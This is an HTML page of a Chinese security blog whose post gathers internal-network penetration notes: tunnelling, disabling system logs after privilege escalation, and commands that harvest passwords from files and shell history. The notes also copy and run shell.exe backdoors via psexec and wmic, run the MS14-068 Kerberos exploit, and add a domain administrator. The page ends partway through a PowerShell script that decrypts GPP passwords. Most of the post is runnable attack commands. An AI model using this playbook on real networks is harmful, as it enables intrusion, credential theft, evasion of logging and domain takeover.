<!DOCTYPE html>
<html  lang="en" >
    <head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, minimum-scale=1, initial-scale=1, maximum-scale=5, viewport-fit=cover">
    <title>内网渗透 | h00ls</title>
    <meta name="description" content="内网渗透对内网渗透做了个总结，会持续更新、补充、修改…… 隧道、代理、端口转发代理与端口转发proxychains只支持TCP，不支持UDP和ICMP等 与nmap使用的时候，会出现问题。需要在配置文件中，注释掉proxy_dns windows端：https:&#x2F;&#x2F;github.com&#x2F;shunf4&#x2F;proxychains-windows.git proxifier适用windows Venomh">
<meta property="og:type" content="article">
<meta property="og:title" content="内网渗透">
<meta property="og:url" content="http://example.com/2021/03/02/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/index.html">
<meta property="og:site_name" content="h00ls">
<meta property="og:description" content="内网渗透对内网渗透做了个总结，会持续更新、补充、修改…… 隧道、代理、端口转发代理与端口转发proxychains只支持TCP，不支持UDP和ICMP等 与nmap使用的时候，会出现问题。需要在配置文件中，注释掉proxy_dns windows端：https:&#x2F;&#x2F;github.com&#x2F;shunf4&#x2F;proxychains-windows.git proxifier适用windows Venomh">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="http://example.com/images/image-20210110155155661.png">
<meta property="og:image" content="http://example.com/images/image-20210110172341623.png">
<meta property="og:image" content="http://example.com/images/image-20210131113629119.png">
<meta property="og:image" content="http://example.com/images/image-20210131113844158.png">
<meta property="og:image" content="http://example.com/images/image-20210131113948798.png">
<meta property="og:image" content="http://example.com/images/image-20210131120225956.png">
<meta property="og:image" content="http://example.com/images/image-20210131120402995.png">
<meta property="og:image" content="http://example.com/images/image-20210131120434157.png">
<meta property="og:image" content="http://example.com/images/image-20210110181328115.png">
<meta property="og:image" content="http://example.com/images/image-20210116105039417.png">
<meta property="og:image" content="http://example.com/images/image-20210116105528377.png">
<meta property="article:published_time" content="2021-03-02T08:18:03.000Z">
<meta property="article:modified_time" content="2021-03-04T05:54:33.324Z">
<meta property="article:author" content="h00ls">
<meta property="article:tag" content="内网渗透专栏">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://example.com/images/image-20210110155155661.png">

    <link rel="alternate" type="application/atom+xml" href="/atom.xml">
    <link rel="icon" href="/images/favicon.png" type="image/x-icon">

    
<link rel="stylesheet" href="/css/common.min.css">



    
    
    
    
        <link href="//cdn.jsdelivr.net/npm/lightgallery.js@1.1.3/dist/css/lightgallery.min.css" rel="stylesheet">
    
    
    
<link rel="stylesheet" href="/css/iconfont.min.css">

    
<meta name="generator" content="Hexo 5.3.0"></head>

    <body>
        <header class="header header-fixture">
    <div class="profile-search-wrap flex sm:block">
        
        
        <div class="profile sm:text-center md:px-1 lg:px-3 sm:pb-4 sm:pt-6">
            <a id="avatar" role="link" href="https://github.com/h00ls" class="inline-block lg:w-16 lg:h-16 w-8 h-8 m-2" target="_blank" rel="noopener" rel="noreferrer" >
                <img src="https://www.gravatar.com/avatar/0bc83cb571cd1c50ba6f3e8a78ef1346?s=128" class="rounded-full" alt="avatar">
            </a>
            <h2 id="name" class="hidden lg:block">h00ls</h2>
            <h3 id="title" class="hidden xl:block">安全那些事</h3>
            
            <small id="location" class="hidden lg:block">
                <i class="iconfont icon-map-icon"></i>
                Sichuan, China
            </small>
            
        </div>
        
        
<div class="search flex-1 flex lg:inline-block sm:hidden lg:px-4 lg:mt-2 lg:mb-4 lg:w-full">
    <form id="search-form" class="my-auto flex-1 lg:border lg:border-solid lg:border-gray-200">
        <div class="input-group table bg-gray-100 lg:bg-white w-full">
            <input id="search-input" type="text" placeholder="Search" class="inline-block w-full bg-gray-100 lg:bg-white">
            <span class="table-cell">
                <button name="search tigger button" disabled>
                    <i class="iconfont icon-search m-2"></i>
                </button>
            </span>
        </div>
    </form>
        
<script id="search-teamplate" type="text/html" data-path="/content.json">
    <div>
        <div class="search-header bg-gray-400">
            <input id="actual-search-input" model="keyword" ref="input" class="inline-block w-full h-10 px-2 py-1" placeholder="Search" type="text">
        </div>
        <div class="search-result bg-gray-200">
            {{#each searchPosts}}
            <a href="/{{ path }}" class="result-item block px-2 pb-3 mb-1 pt-1 hover:bg-indigo-100">
                <i class="iconfont icon-file"></i>
                <h1 class="result-title inline font-medium text-lg">{{ title }}</h1>
                <p class="result-content text-gray-600 text-sm">{{{ text }}}</p>
            </a>
            {{/each}}
        </div>
    </div>
</script>

</div>


        <button name="menu toogle button" id="menu-toggle-btn" class="block sm:hidden p-3" role="button" aria-expanded="false">
            <i class="iconfont icon-hamburger"></i>
        </button>
    </div>
    <nav id="menu-nav" class="hidden sm:flex flex-col">
        
        
            <div class="menu-item menu-home" role="menuitem">
                <a href="/.">
                    <i class="iconfont icon-home" aria-hidden="true"></i>
                    <span class="menu-title">Home</span>
                </a>
            </div>
        
        
            <div class="menu-item menu-archives" role="menuitem">
                <a href="/archives">
                    <i class="iconfont icon-archive" aria-hidden="true"></i>
                    <span class="menu-title">Archives</span>
                </a>
            </div>
        
        
            <div class="menu-item menu-categories" role="menuitem">
                <a href="/categories">
                    <i class="iconfont icon-folder" aria-hidden="true"></i>
                    <span class="menu-title">Categories</span>
                </a>
            </div>
        
        
            <div class="menu-item menu-tags" role="menuitem">
                <a href="/tags">
                    <i class="iconfont icon-tag" aria-hidden="true"></i>
                    <span class="menu-title">Tags</span>
                </a>
            </div>
        
        
            <div class="menu-item menu-repository" role="menuitem">
                <a href="/repository">
                    <i class="iconfont icon-project" aria-hidden="true"></i>
                    <span class="menu-title">Repository</span>
                </a>
            </div>
        
        
            <div class="menu-item menu-links" role="menuitem">
                <a href="/links">
                    <i class="iconfont icon-friend" aria-hidden="true"></i>
                    <span class="menu-title">Links</span>
                </a>
            </div>
        
        
            <div class="menu-item menu-about" role="menuitem">
                <a href="/about">
                    <i class="iconfont icon-cup" aria-hidden="true"></i>
                    <span class="menu-title">About</span>
                </a>
            </div>
        
        
<div class="social-links flex sm:flex-col lg:hidden mt-5">
    
        <span class="social-item text-center">
            <a target="_blank" rel="noopener" href="https://github.com/h00ls">
                <i class="iconfont social-icon icon-github"></i>
                <span class="menu-title hidden lg:inline">menu.github</span>
            </a>
        </span>
    
        <span class="social-item text-center">
            <a href="/atom.xml">
                <i class="iconfont social-icon icon-rss"></i>
                <span class="menu-title hidden lg:inline">menu.rss</span>
            </a>
        </span>
    
</div>


    </nav>
</header>

        <section class="main-section">
            
    <main class="flex-1 px-4 py-12 md:px-5 lg:px-8 lg:py-4 relative min-h-screen">
    

    <article class="content article article-archives article-type-list" itemscope="">
        <header class="article-header">
            
    
        <h1 class="article-title text-lg" itemprop="name">
            内网渗透
        </h1>
    



            <p class="article-meta mb-3 text-xs">
                <span class="article-date">
    <i class="iconfont icon-calendar-check"></i>
	<a href="/2021/03/02/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/" class="article-date">
	  <time datetime="2021-03-02T08:18:03.000Z" itemprop="datePublished">Mar 2</time>
	</a>
</span>

                

                
    <span class="article-tags">
    <i class="iconfont icon-tag"></i>
    <a class="article-tag-none-link" href="/tags/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%E4%B8%93%E6%A0%8F/" rel="tag">内网渗透专栏</a>
  </span>


                <span class="_partial/post-comment"><i class="icon icon-comment"></i>
                    <a href="/2021/03/02/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/#comments" class="article-comment-link">
                        Comments
                    </a>
                </span>
                
    
        <span class="post-wordcount" itemprop="wordCount">Word Count: 5.1k(words)</span>
    
    
        <span class="post-readcount" itemprop="timeRequired">Read Count: 23(minutes)</span>
    


            </p>
        </header>
        <div class="marked-body article-body">
            <h1 id="内网渗透"><a href="#内网渗透" class="headerlink" title="内网渗透"></a>内网渗透</h1><p>对内网渗透做了个总结，会持续更新、补充、修改……</p>
<h2 id="隧道、代理、端口转发"><a href="#隧道、代理、端口转发" class="headerlink" title="隧道、代理、端口转发"></a>隧道、代理、端口转发</h2><h3 id="代理与端口转发"><a href="#代理与端口转发" class="headerlink" title="代理与端口转发"></a>代理与端口转发</h3><h4 id="proxychains"><a href="#proxychains" class="headerlink" title="proxychains"></a>proxychains</h4><p>只支持<code>TCP</code>，不支持<code>UDP</code>和<code>ICMP</code>等</p>
<p>与<code>nmap</code>使用的时候，会出现问题。需要在配置文件中，注释掉<code>proxy_dns</code></p>
<p>windows端：<a target="_blank" rel="noopener" href="https://github.com/shunf4/proxychains-windows.git">https://github.com/shunf4/proxychains-windows.git</a></p>
<h4 id="proxifier"><a href="#proxifier" class="headerlink" title="proxifier"></a>proxifier</h4><p>适用windows</p>
<h4 id="Venom"><a href="#Venom" class="headerlink" title="Venom"></a>Venom</h4><p><a target="_blank" rel="noopener" href="https://github.com/Dliv3/Venom">https://github.com/Dliv3/Venom</a></p>
<h4 id="IOX"><a href="#IOX" class="headerlink" title="IOX"></a>IOX</h4><p>下载链接：<a target="_blank" rel="noopener" href="https://github.com/EddieIvan01/iox/blob/master/docs/README_CN.md">https://github.com/EddieIvan01/iox/blob/master/docs/README_CN.md</a></p>
<h3 id="隧道搭建"><a href="#隧道搭建" class="headerlink" title="隧道搭建"></a>隧道搭建</h3><h4 id="判断协议出网"><a href="#判断协议出网" class="headerlink" title="判断协议出网"></a>判断协议出网</h4><p>dns</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">nslookup 8.8.8.8  # windows</span><br><span class="line">dig 8.8.8.8   # linux</span><br></pre></td></tr></table></figure>
<p>http</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">curl www.baidu.com   # windows</span><br><span class="line">wget www.baidu.com</span><br></pre></td></tr></table></figure>
<p>icmp</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ping www.baidu.com</span><br></pre></td></tr></table></figure>
<p>tcp</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">telnet www.baidu.com</span><br></pre></td></tr></table></figure>
<h4 id="搭建隧道"><a href="#搭建隧道" class="headerlink" title="搭建隧道"></a>搭建隧道</h4><p><strong>dnscat2</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">https:&#x2F;&#x2F;github.com&#x2F;iagox86&#x2F;dnscat2</span><br></pre></td></tr></table></figure>
<p><strong>Neo-reGeorg</strong>    </p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">https:&#x2F;&#x2F;github.com&#x2F;L-codes&#x2F;Neo-reGeorg</span><br></pre></td></tr></table></figure>
<p><strong>SSH</strong></p>
<ul>
<li><p>本地转发</p>
<p>在本地监听一个端口，并转发到远程主机上</p>
</li>
</ul>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"># 监听在本地9906端口，并把9906的数据转发到目标主机上3389端口</span><br><span class="line">ssh -g -f -N -L 9906:target_ip:3306 root@target_ip</span><br><span class="line"># 例如</span><br><span class="line">ssh -L 9527:192.168.191.77:23 -fN 192.168.191.66</span><br><span class="line">在本地55的机器上执行上面命令，它会将本地9527端口经过66主机转发到77的主机的23端口上</span><br></pre></td></tr></table></figure>
<ul>
<li><p>远程端口转发</p>
<p>在远程主机上监听一个端口，并转发到本地</p>
</li>
</ul>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">ssh -R 9527:192.168.191.77:23 -fN 192.168.191.55</span><br><span class="line">在远程55的机器上执行上面命令，它会将远程55主机的9527端口经过本地机器转发到77的主机的23端口上</span><br></pre></td></tr></table></figure>
<p><a target="_blank" rel="noopener" href="http://www.zsythink.net/archives/2450">http://www.zsythink.net/archives/2450</a></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"># 配置文件 &#x2F;etc&#x2F;ssh&#x2F;sshd_config</span><br><span class="line"></span><br><span class="line">AllowAgentForwarding yes</span><br><span class="line">AllowTcpForwarding yes</span><br><span class="line">GatewayPorts yes</span><br></pre></td></tr></table></figure>
<h2 id="关闭系统日志记录"><a href="#关闭系统日志记录" class="headerlink" title="关闭系统日志记录"></a>关闭系统日志记录</h2><p>提权后关闭系统日志记录</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">工具：https:&#x2F;&#x2F;github.com&#x2F;hlldz&#x2F;Invoke-Phant0m.git</span><br></pre></td></tr></table></figure>
<h2 id="信息收集"><a href="#信息收集" class="headerlink" title="信息收集"></a>信息收集</h2><ul>
<li><p>查看当前用户及权限</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">whoami &#x2F;user</span><br><span class="line">whoami &#x2F;priv</span><br></pre></td></tr></table></figure></li>
</ul>
<ul>
<li><p>查看在线用户</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">query user | quser</span><br><span class="line"># 避开管理员</span><br></pre></td></tr></table></figure></li>
<li><p>查看当前用户属组</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">net user [username]</span><br></pre></td></tr></table></figure></li>
<li><p>查看主机名、工作组/域、操作系统信息</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">systeminfo</span><br><span class="line"></span><br><span class="line">net config workstation</span><br><span class="line"></span><br><span class="line">wmic OS get Caption, CSDVersion, OSArchitecture, Version</span><br></pre></td></tr></table></figure></li>
<li><p>补丁信息</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">WMIC.exe qfe get HotFixID   </span><br><span class="line"></span><br><span class="line">&gt;&gt;&gt;&gt; 查询可提权网站：http:&#x2F;&#x2F;bugs.hacking8.com&#x2F;tiquan&#x2F;</span><br><span class="line">&gt;&gt;&gt;&gt; 使用工具查询：https:&#x2F;&#x2F;github.com&#x2F;AonCyberLabs&#x2F;Windows-Exploit-Suggester.git</span><br></pre></td></tr></table></figure></li>
<li><p>杀软信息</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">wmic &#x2F;namespace:\\root\securitycenter2 path antivirusproduct GET displayName</span><br></pre></td></tr></table></figure></li>
<li><p>搜索域控</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">WMIC.exe ntdomain</span><br><span class="line">net time &#x2F;domain</span><br></pre></td></tr></table></figure></li>
<li><p>收集敏感信息：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"># 敏感文件收集</span><br><span class="line">dir &#x2F;a &#x2F;s &#x2F;b d:\&quot;*.txt|*.xml|*.mdb|*.sql|*.mdf|*.eml|*.pst|*conf*|*bak*|*pwd*|*pass*|*login*|*user*&quot;</span><br><span class="line">	</span><br></pre></td></tr></table></figure>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"># 账号密码收集</span><br><span class="line">findstr &#x2F;si pass *.inc *.config *.ini *.txt *.asp *.aspx *.php *.jsp *.xml *.cgi *.bak</span><br><span class="line"></span><br><span class="line">findstr &#x2F;si userpwd *.inc *.config *.ini *.txt *.asp *.aspx *.php *.jsp *.xml *.cgi *.bak</span><br><span class="line"></span><br><span class="line">findstr &#x2F;si password *.inc *.config *.ini *.txt *.asp *.aspx *.php *.jsp *.xml *.cgi *.bak</span><br><span class="line"></span><br><span class="line">findstr &#x2F;si login *.inc *.config *.ini *.txt *.asp *.aspx *.php *.jsp *.xml *.cgi *.bak</span><br><span class="line"></span><br><span class="line">findstr &#x2F;si user *.inc *.config *.ini *.txt *.asp *.aspx *.php *.jsp *.xml *.cgi *.bak</span><br><span class="line"></span><br><span class="line">findstr &#x2F;si pwd *.inc *.config *.ini *.txt *.asp *.aspx *.php *.jsp *.xml *.cgi *.bak</span><br><span class="line"></span><br><span class="line">findstr &#x2F;si username *.inc *.config *.ini *.txt *.asp *.aspx *.php *.jsp *.xml *.cgi *.bak</span><br></pre></td></tr></table></figure></li>
<li><p>查看目标主机共享</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">net view \\target-ip   # 是否用空密码访问权限，如果知道用户名和密码</span><br><span class="line">copy shell.exe \\ip\c$\windows\temp\shell.exe</span><br></pre></td></tr></table></figure></li>
<li><p>执行后门</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">psexec \\ip -u userName -p userPass cmd.exe c:\windows\temp\shell.exe</span><br><span class="line"></span><br><span class="line">csript.exe wmiexec.vbs &#x2F;cmd domainName userName userPass &quot;ipconfig&quot;</span><br><span class="line"></span><br><span class="line">wmic &#x2F;node:ip &#x2F;user:userName &#x2F;password:userPass process call create &quot;C:\Windows\temp\shell.exe&quot;</span><br></pre></td></tr></table></figure>
<h2 id="收集用户口令"><a href="#收集用户口令" class="headerlink" title="收集用户口令"></a>收集用户口令</h2></li>
</ul>
<h5 id="windows"><a href="#windows" class="headerlink" title="windows"></a>windows</h5><p>mimikatz、LaZagne</p>
<p>Xshell凭证</p>
<p>远程连接凭证：<a target="_blank" rel="noopener" href="https://github.com/3gstudent/List-RDP-Connections-History.git">https://github.com/3gstudent/List-RDP-Connections-History.git</a></p>
<h5 id="linux"><a href="#linux" class="headerlink" title="linux"></a>linux</h5><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">find .&#x2F; -type f -regex &#39;.*\.txt|.*\.xml|.*\.php|.*\.jsp|.*\.conf|.*\.bak|.*\.js|.*\.inc|.*\.htpasswd|.*\.inf|.*\.ini|.*\.log|.*\.new&#39; | xargs egrep &quot;user|uname|pass|pwd|admin&quot;</span><br><span class="line"></span><br><span class="line">cat &#x2F;root&#x2F;.bash_history|grep -Ei -C 2 &#39;ssh|mysql|ftp|scp|su|root|passwd&#39;</span><br></pre></td></tr></table></figure>
<h2 id="存活主机"><a href="#存活主机" class="headerlink" title="存活主机"></a>存活主机</h2><h5 id="Windows"><a href="#Windows" class="headerlink" title="Windows"></a>Windows</h5><p>NetBIOS   UDP   137端口</p>
<p>ICMP</p>
<p>smb_version</p>
<p>telnet(需自己上传)</p>
<h5 id="Linux"><a href="#Linux" class="headerlink" title="Linux"></a>Linux</h5><h2 id="提权"><a href="#提权" class="headerlink" title="提权"></a>提权</h2><h3 id="Mysql提权"><a href="#Mysql提权" class="headerlink" title="Mysql提权"></a>Mysql提权</h3><h4 id="UDF提权"><a href="#UDF提权" class="headerlink" title="UDF提权"></a>UDF提权</h4><p>udf.dll 存放位置</p>
<blockquote>
<p>mysql &gt; 5.1，udf.dll存放在 <code>%mysql%\lib\plugin</code></p>
<p>mysql &lt;5.1 ，udf.dll 存放在 <code>C:\windows</code> 或者 <code>C:\windows\system32</code></p>
</blockquote>
<p>secure_file_priv 文件</p>
<blockquote>
<p>ure_file_priv的值为null ，表示限制mysqld 不允许导入|导出</p>
<p>当secure_file_priv的值为/tmp/ ，表示限制mysqld 的导入|导出只能发生在/tmp/目录下</p>
<p>当secure_file_priv的值没有具体值时，表示不对mysqld 的导入|导出做限制</p>
</blockquote>
<h4 id="Mof提权"><a href="#Mof提权" class="headerlink" title="Mof提权"></a>Mof提权</h4><h2 id="域环境"><a href="#域环境" class="headerlink" title="域环境"></a>域环境</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">net user   本机用户</span><br><span class="line">net user &#x2F;domain   域用户</span><br><span class="line">net user username &#x2F;domain   获取指定用户信息</span><br><span class="line">net user username newpassword  &#x2F;domain   修改域用户密码</span><br><span class="line"></span><br><span class="line">net group &#x2F;domain  查看域工作组</span><br><span class="line">net group &quot;domain admins&quot; &#x2F;domain   查看域管理员列表</span><br><span class="line">net group &quot;enterprise admins&quot; &#x2F;domain   企业管理员列表</span><br><span class="line">net group &quot;domain controllers&quot; &#x2F;domain   查看域控制器</span><br><span class="line"></span><br><span class="line">net localgroup administrators &#x2F;domain   登录本机的域用户</span><br><span class="line"></span><br><span class="line">net time &#x2F;domain   判断域控</span><br><span class="line"></span><br><span class="line">net view  查看域内机器列表</span><br><span class="line">net start  查看当前运行的服务</span><br><span class="line">net session  查看当前的会话</span><br></pre></td></tr></table></figure>
<p>定位域控</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">1、DNS定位域控</span><br><span class="line">nslookup</span><br><span class="line">&gt;&gt;set type&#x3D;all</span><br><span class="line">&gt;&gt;test.com</span><br><span class="line"></span><br><span class="line">2、nltest &#x2F;dclist:test.com</span><br><span class="line"></span><br><span class="line">3、net time &#x2F;domain</span><br><span class="line"></span><br><span class="line">4、端口：389(ldap)、53(dns)</span><br></pre></td></tr></table></figure>
<p>主机存活探测</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">和上面一样</span><br></pre></td></tr></table></figure>
<h3 id="获取域控"><a href="#获取域控" class="headerlink" title="获取域控"></a>获取域控</h3><h4 id="ms14-068"><a href="#ms14-068" class="headerlink" title="ms14-068"></a>ms14-068</h4><p>把普通域用户提升到域控权限，补丁：KB3011780</p>
<p>方式一、</p>
<p><a target="_blank" rel="noopener" href="https://github.com/gentilkiwi/kekeo">https://github.com/gentilkiwi/kekeo</a></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">kekeo.exe &quot;exploit::ms14068 &#x2F;domain:test.com  &#x2F;user:username &#x2F;password:password &#x2F;ptt&quot; &quot;exit&quot;</span><br></pre></td></tr></table></figure>
<p>方式二、</p>
<p>mimikatz，这时候并不需要管理员权限。</p>
<p>ms14-068：<a target="_blank" rel="noopener" href="https://github.com/abatchy17/WindowsExploits/tree/master/MS14-068">https://github.com/abatchy17/WindowsExploits/tree/master/MS14-068</a></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">whoami &#x2F;user   #获取sid</span><br><span class="line">ms14-068.exe -u [域用户]@[所在域] -s [域用户SID] -p [域用户密码] -d [域控地址]     #制作凭证</span><br><span class="line">kerberos::purge    #清除原有凭证</span><br><span class="line">mimikatz.exe &quot;kerberos::ptc c:[上面的凭证]&quot; exit   &#x2F;&#x2F;导入新的凭证</span><br></pre></td></tr></table></figure>
<p>可以在<code>msf</code>中的<code>meterpreter</code>中直接使用</p>
<p><img src="/images/image-20210110155155661.png" alt="image-20210110155155661"> </p>
<p>使用psexec远程连接即可</p>
<p><img src="/images/image-20210110172341623.png" alt="image-20210110172341623"></p>
<p>就可以直接添加域管理员</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">net user username password &#x2F;add &#x2F;domain</span><br><span class="line">net group &quot;Domain admins&quot; username &#x2F;add &#x2F;domain</span><br></pre></td></tr></table></figure>
<h4 id="GPP"><a href="#GPP" class="headerlink" title="GPP"></a>GPP</h4><p> <strong>存在的意义：</strong>在比较大一点的环境中，我们会经常遇到这样的情况，由于电脑的批次不一样，或IT人员流动的问题，造成电脑的本地管理员密码不一致，当我们需要登录到本地管理员的时候，往往会不知道本地管理员密码，虽然我们可以通过进PE的办法破解密码，但如果电脑比较多，那么这将是一个讨厌的工作。如果是域环境，我们可以组策略的方式批量修改计算机的本地管理员密码。</p>
<p><strong>利用：</strong>实质上就是一种信息收集的方式，可能存在密码重用</p>
<p>直接访问<code>\\king.com\SYSVOL\king.com\Policies\&#123;0FD0DF94-3629-4ECA-B858-6F0C60B3A821&#125;\User\Preferences\Groups</code></p>
<p>使用脚本解密：</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># define helper function that decodes and decrypts password</span></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">Get-DecryptedCpassword</span></span> &#123;</span><br><span class="line">    [<span class="type">CmdletBinding</span>()]</span><br><span class="line">    <span class="keyword">Param</span> (</span><br><span class="line">        [<span class="built_in">string</span>] <span class="variable">$Cpassword</span></span><br><span class="line">    )</span><br><span class="line"></span><br><span class="line">    <span class="keyword">try</span> &#123;</span><br><span class="line">        <span class="comment">#Append appropriate padding based on string length</span></span><br><span class="line">        <span class="variable">$Mod</span> = (<span class="variable">$Cpassword</span>.length % <span class="number">4</span>)</span><br><span class="line"></span><br><span class="line">        <span class="keyword">switch</span> (<span class="variable">$Mod</span>) &#123;</span><br><span class="line">            <span class="string">&#x27;1&#x27;</span> &#123;<span class="variable">$Cpassword</span> = <span class="variable">$Cpassword</span>.Substring(<span class="number">0</span>,<span class="variable">$Cpassword</span>.Length <span class="literal">-1</span>)&#125;</span><br><span class="line">            <span class="string">&#x27;2&#x27;</span> &#123;<span class="variable">$Cpassword</span> += (<span class="string">&#x27;=&#x27;</span> * (<span class="number">4</span> - <span class="variable">$Mod</span>))&#125;</span><br><span class="line">            <span class="string">&#x27;3&#x27;</span> &#123;<span class="variable">$Cpassword</span> += (<span class="string">&#x27;=&#x27;</span> * (<span class="number">4</span> - <span class="variable">$Mod</span>))&#125;</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        <span class="variable">$Base64Decoded</span> = [<span class="type">Convert</span>]::FromBase64String(<span class="variable">$Cpassword</span>)</span><br><span class="line">        </span><br><span class="line">        <span class="comment"># Make sure System.Core is loaded</span></span><br><span class="line">        [<span class="type">System.Reflection.Assembly</span>]::LoadWithPartialName(<span class="string">&quot;System.Core&quot;</span>) |<span class="built_in">Out-Null</span></span><br><span class="line"></span><br><span class="line">        <span class="comment">#Create a new AES .NET Crypto Object</span></span><br><span class="line">        <span class="variable">$AesObject</span> = <span class="built_in">New-Object</span> System.Security.Cryptography.AesCryptoServiceProvider</span><br><span class="line">        [<span class="built_in">Byte</span>[]] <span class="variable">$AesKey</span> = <span class="selector-tag">@</span>(<span class="number">0</span>x4e,<span class="number">0</span>x99,<span class="number">0</span>x06,<span class="number">0</span>xe8,<span class="number">0</span>xfc,<span class="number">0</span>xb6,<span class="number">0</span>x6c,<span class="number">0</span>xc9,<span class="number">0</span>xfa,<span class="number">0</span>xf4,<span class="number">0</span>x93,<span class="number">0</span>x10,<span class="number">0</span>x62,<span class="number">0</span>x0f,<span class="number">0</span>xfe,<span class="number">0</span>xe8,</span><br><span class="line">                             <span class="number">0</span>xf4,<span class="number">0</span>x96,<span class="number">0</span>xe8,<span class="number">0</span>x06,<span class="number">0</span>xcc,<span 